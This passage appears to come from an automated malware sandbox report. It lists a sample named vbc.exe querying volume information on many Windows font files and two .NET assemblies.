Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
